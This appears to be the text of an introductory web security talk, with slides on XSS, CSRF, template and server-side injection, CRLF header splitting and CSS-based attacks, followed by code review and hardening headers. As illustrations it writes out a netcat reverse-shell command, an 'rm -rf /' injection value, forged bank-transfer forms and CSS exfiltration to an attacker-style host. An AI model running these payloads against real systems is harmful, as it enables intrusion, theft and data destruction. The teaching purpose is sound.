Web Security 101

Things that can make a difference.

Renato Rodrigues

<?xml version="1.0" encoding="UTF-8"?>
        <webapps>What we'll be looking for</webapps>
        <browsers>Web Apps Home</browsers>
        <xss>Cross-site scripting</xss>
        <csrf>Cross-Site Request Forgery</csrf>
        <templates-inj><%{It can be handy}%></templates-inj>
        <codereview>Now what?</code-review>
        <hardening>Small steps</hardening>

Web Applications

What we'll be looking for

What it is?

In computing, a web application or web app is a client–server software application which the client (or user interface) runs in a web browser.


Modern Apps

What we need to know


The Big Picture

We know that a modern Web App is a pile of technology.

How many stacks are being used?
The links between them?
Possible weaknesses

Can we understand:

Graphics and Statistics from Outdated Browser

Cross-site Scripting

new class extends alert("PixelsCamp"){}



What we should know

Probably the most prevalent security flaw in Web Applications.


Takes advantage of browsers' features and work flows.


All data sources can be used as a payload.
(DB data, URLs, Emails, Forms, Local Storage, ...)


Reflected XSS

Reflected Cross-site Scripting (XSS) occurs when an attacker injects browser executable code within a single HTTP response.


it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page.

Stored XSS

The persistent (or stored) XSS vulnerability it occurs when the data provided by the attacker is saved, and then permanently displayed to other users in the course of regular browsing, without proper escaping.


DOM Based XSS is an XSS attack wherein the attack payload is executed as a result of modifying the DOM "environment" in the victim’s browser used by the original client side script, so that the client side code runs in an "unexpected" manner.

Mutation XSS

Mutation XSS was coined by Gareth Heyes and Mario Heiderich to describe an XSS vector that is mutated from a safe state into an unsafe unfiltered state. The most common form of mXSS is from incorrect reads of innerHTML.

## https://html5sec.org/innerhtml/
Input:    <a/href/title>Mutation
Mutation: <a href="" title="">Mutation</a>

Blind XSS

A type of Persistent (stored) XSS. patience and hope are the key factors, since we don't know where or whether our payload is going to be executed and end up.


Validate all inputs.
(If I want a name, maybe numbers and most of the symbols shouldn't be accepted 😉)

Escape all outputs

No straight forward approach but we can...

   alert('Hello, World!');
   //Using ö as a special char
   alert('Hellö World!');
   //Mix of Encodings
   alert('Неllо Wоrld!');

Escaped String:
   alert(\'Hello, World!\');\n 
   alert(\'Hell\xF6 World!\');\n
   alert(\'\u041D\u0435ll\u043E W\u043Erld!\');\n


//Normal String

//Escaped String

//Html Output
//Normal String 

//Escaped String via CSS.escape(".foo#bar")


var element = document.querySelector('#' + CSS.escape(id) + ' > img');
var element = document.querySelector('a[href="#' + CSS.escape(fragment) + '"]');




No straight forward approach but we can...

Use CSP Header as hardening strategy. 


<img src="http://site.com/someaction.php?item-id=666&ship_to=BAD_GUY"
height="0" width="0">

Cross-Site Request Forgery

What we should know

CSRF is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.

In Reality

Attack Prerequisite: Victim needs to be authenticated.


Creates forged HTTP requests.
Creates malicious web pages which generate forged requests.


Trick the victim into submitting/do a request with interaction or via seamless mechanism triggered when entering the page.

Attack Example

//Original Request - From Maria Account to Bob $100
GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1

//Send $100000 to Maria (Attacker Request)

//Attack #1
<a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>
//Attack #2
<img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" 
                                                    width="0" height="0" border="0">

via GET

//Original Request - From Maria Account to Bob $100
POST http://bank.com/transfer.do HTTP/1.1


//Send $100000 to Maria (Attacker Request)
<form action="http://bank.com/transfer.do" method="POST">
<input type="hidden" name="acct" value="MARIA"/>
<input type="hidden" name="amount" value="100000"/>
<input type="submit" value="View my pictures"/>

//Attack #1
<body onload="document.forms[0].submit()">
//Attack #2
$(document).ready(function() {

via POST

Attack Example


1 - Create one unique token per user

2 - Tokens should change per session or request.

3 - Add a per-request token/nonce in addition to the standard session.

Note: If you don't verify tokens/nonces, why bother?!

Use special Headers (SPA).

Same-site cookies

Server-Side Template Injection

{{%It can be handy%}}


What we should know

Web application uses templates to make the web pages look more dynamic. Template Injection occurs when user input is embedded in a template in an unsafe manner.

However, on the surface, this vulnerability is easy to be mistaken for XSS attacks.

In Practice

 Flask leverages the Jinga2 engine


def hello_ssti():
    person = {'name':"world", 'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
    if request.args.get('name'):
        person['name'] = request.args.get('name')
    template = '''<h2>Hello %s!</h2>''' % person['name']
    return render_template_string(template, person=person)


def hello_ssti():
    person = {'name':"world", 'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
    if request.args.get('name'):
        person['name'] = request.args.get('name')
    #template = '''<h2>Hello %s!</h2>''' % person['name']
    template = '<h2>Hello {{ person.name }}!</h2>'
    return render_template_string(template, person=person)


The issue arises due to the use of string concatenation or substitution.

In Practice

 Flask leverages the Jinga2 engine

Server-Side Injections


('netcat -e /bin/sh IP_TO_CONNECT 9999')

What we're talking about

SSI (Server-side Include) Injection is a server-side exploit technique that allows an attacker to send code into a web application, which will later be executed locally by the web server.

Attacker code will land on the server-side and we hope to get an execution sink.

In Reality

exec('rm -rf web/upload/' . $_GET['file']);
// example.org?file=*; rm -rf /;
router.post('/demo1', function(req, res) {
  var year = eval("year = (" + req.body.year + ")");
  var date = new Date();

  var futureAge = 2050 - year;

      title: 'Future Age',
      output: futureAge

<!-- https://goo.gl/nUp0NG -->



Server-Side JS Injection

Digging into the JS world!


The eval() function evaluates or executes an argument.

To schedule execution of a one-time callback after delay milliseconds.

To schedule the repeated execution of callback every delay milliseconds.

ES6 Power

($=>{return inj})()
new Promise($=>inj)
function a(a=inj){}; a();

Headers Injection


HTTP Response Splitting


Attack usually occurs when there is an input being reflected in a header field of a HTTP response.

If the output is not properly sanitized, attackers can inject arbitrary headers or contents into the response.

In Practice

Carriage Return (CR)

 \r or %0d

Line Feed (LF)

 \n or %0a

                  CR LF                    CR LF CR LF

## Not Vulnerable ##
HTTP/1.1 302 Found
Location: /foo?lang=barContent-Length: 0HTTP/1.1 200 OKContent-Length:...
Date: Thu, 21 Jan 2016 11:52:34 GMT
Connection: keep-alive
Transfer-Encoding: chunked


## Vulnerable Example ##
HTTP/1.1 302 Found
Location: /foo?lang=bar
Content-Length: 0

HTTP/1.1 200 OK
Content-Length: 20

CRLF -> %0d%0a -> (Hit Enter)

In The Wild

Most of the times CRLF are sanitized and it is safe until it is mutated.

Enconding FTW!

CR Alternatives

č | 嘍

Origin Form:   U+010D U+560D
UTF8 Encoded: %C4%8D %E5%98%8D
Decoded:        01 0D   56 0D
01 0D   56 0D

LF Alternatives

Ċ |

Origin Form:   U+010A U+560A
UTF8 Encoded: %C4%8A %E5%98%8A
Decoded:       01 0A    56 0A
01 0A    56 0A

CSS as a Friend

body {
  margin: 0;
  padding: 0;
  background: #ff0000 url(//what.com) Center;
  overflow: hidden;
  font-family: Helvetica;

We are talking about CSS...

 Style sheet language used for describing the look and formatting of a document written in a markup language.

History to Remember

Dynamic propertites i.e. Expression, Behaviors, HTML Component and Scriptlet.

<p style=color:expression(alert(1)) | style="background: url(javascript:alert(1))">



Internet Explorer

<input style="-moz-binding: url(//evil.com/xbl.xml#xss)">

CSS property -moz-binding that attaches an XBL binding to a DOM element.

<input style="-o-link: 'javascript:alert(1)'; -o-link-source: current">

-o-link unique CSS property from Presto to generate a link.

Cold Hard Facts

Defacement and Phishing


Data Leakage via Attribute-Selector




Sessions Ownage (FF)


Mutation XSS


<input type="hidden" name="secret" value="XYZ">

#secret[value='XYZ'] {
    background: url(//exfiltration.pw/?secret=XYZ);

Reality Check

 Compatibility View (or compat mode) FTW!

Internet Explorer

<meta http-equiv="X-UA-Compatible" content="IE=5-10">

Docmode allows inheritance through frame hierarchy.


OLD Features are back!

Not all but...

Reality Check

HTML Component (.htc) is supported up to docmode 9

Scriptlet (.sct)


## Attack
<meta http-equiv="X-UA-Compatible" content="ie=10">
<iframe src="https://victim.com/?xss=' style='behavior: url(//victim.com/xss.sct)"></iframe>

## xss.sct (file also has to be on the same domain)
    <implements type="behavior"/>


Only for IE10 or below
Need Docmode IE7


SQL Injection (SQLi)

Session Fixation

XML External Entity (XXe)

Dir Traversal

Insecure Direct Object References

Broken Authentication and Session Management

Server Side Request Forgery (SSRF)

Unvalidated Redirects and Forwards

Insecure Cryptographic Storage

Relative Path Overwrite (RPO)


Code Review

We have the code... now what?

What is it?

Security code review is the process of   auditing the source code for an application to verify:

      - that the proper security and logical             controls are present;

      - that they work as intended;

      - that they have been invoked in all the           right places.

There are no magic potions

Always look for User Inputs and where data and information are stored (Storage).

Modern apps interact with several services, so we should look for Communication Links and associated data.


When lost, look for Juicy Functions like:

upload, register, validate, giveSomething() and so on.


Tips and Tricks

Ticks to the rescue

Sometimes it's not present in the code

Hardening Features/Configurations

Data Validation
Authentication / Authorization
Session Management
Error Handling


Small steps

Header set X-Frame-Options SAMEORIGIN
Header set X-XSS-Protection 1;mode=block
Header set X-Content-Type-Options nosniff
Header set Strict-Transport-Security max-age=31536000;
Header set Content-Security-Policy default-src 'self'

HTTP Headers

HTTP headers are the core part of HTTP requests and responses, and they carry information about the browser, the requested content, the server and more.

 Sets the configuration for the cross-site scripting filters built into most browsers. The best configuration is "X-XSS-Protection: 1; mode=block".

X-XSS-Protection 1; mode=block


Tells the browser whether you want to allow your site to be framed or not. By preventing a browser from framing your site you can defend against attacks like clickjacking.




Stops a browser from trying to MIME-sniff the content type and forces it to stick with the declared content-type. This helps to reduce the danger of drive-by downloads. .

X-Content-Type-Options nosniff


Is an excellent feature to support on your site and strengthens your implementation of TLS by getting the User Agent to enforce the use of HTTPS.

Strict-Transport-Security max-age=31536000; includeSubdomains; preload


Is an effective measure to protect your site from several attacks.

By whitelisting sources of approved content, you can prevent the browser from loading malicious assets.

Content-Security-Policy default-src 'self'; script-src 'self' ...

CSP Builder (Helper): https://report-uri.io/home/generate


Protects your site from MiTM attacks using rogue X.509 certificates.

By whitelisting only the identities that the browser should trust, your users are protected in the event a certificate authority is compromised.

Public-Key-Pins pin-sha256="t/OMbK...JM="; max-age=600; report-uri="..."


The overarching goal is to reduce the burden of migrating websites from a priori insecure origins by reducing the negative side effects of mixed content blocking.

<meta http-equiv=Content-Security-Policy content=upgrade-insecure-requests>

Upgrade-Insecure-Requests 1

Subresource Integrity

Mechanism by which user agents may verify that a fetched resource has been delivered without unexpected manipulation.

<script src="https://example.com/example-framework.js"


Session, Secure, HTTPOnly and SameSite



Can we do it?


https://bugcrowd.com - https://hackerone.com
Search for a Security Page


Reputation - Money - Fun - Test new attacks

Above all improve AppSec Skills


Discovery Date: dd/MM/YY - HH:mm:ss
System/Domain: E.g. https://sub.website.com/
Vulnerability Type: XSS / RCE / CSRF /...
Description: Detailed explanation of the vulnerability. 
Impact: In the context of the vulnerable service/app.

Proof of Concept Data (PoC)
* Works in: Google Chrome/Firefox/MSIE/Safari
* Attack Vector: How to trigger the vulnerability.
* Payload: What triggers the vulnerability. 
PoC Image/Video: Visual proof.
Mitigation: If we have an idea how to fix we should suggest.
Notes: If pertinent.

Be polite, don't beg, don't put down the entire network (just because you can) and remember on the other side, there's always a busy team!

The End!

Renato Rodrigues - @SiMpS0N - //pathonproject.com

Web Security 101 - Things that can make a difference.

By Renato Rodrigues

Web Security 101 - Things that can make a difference.

Security nowadays is a hot topic. Everyone is on alert for the latest database leak, closely tracking the updates on the business losing millions on a hack and digging deep on the web to find ways to stay protected. Everyone needs to start somewhere. However, getting the basics right isn't always a straightforward process. On this presentation, I will tap into the foundations of web security and also give an overview of the latest trends in attacks such as template, server side injections and weird attacks with CSS. Ultimately, provide ways to improve or put new skills into practice to stay ahead of the game. (https://www.youtube.com/watch?v=Tep11H8O5x4)

  • 6,876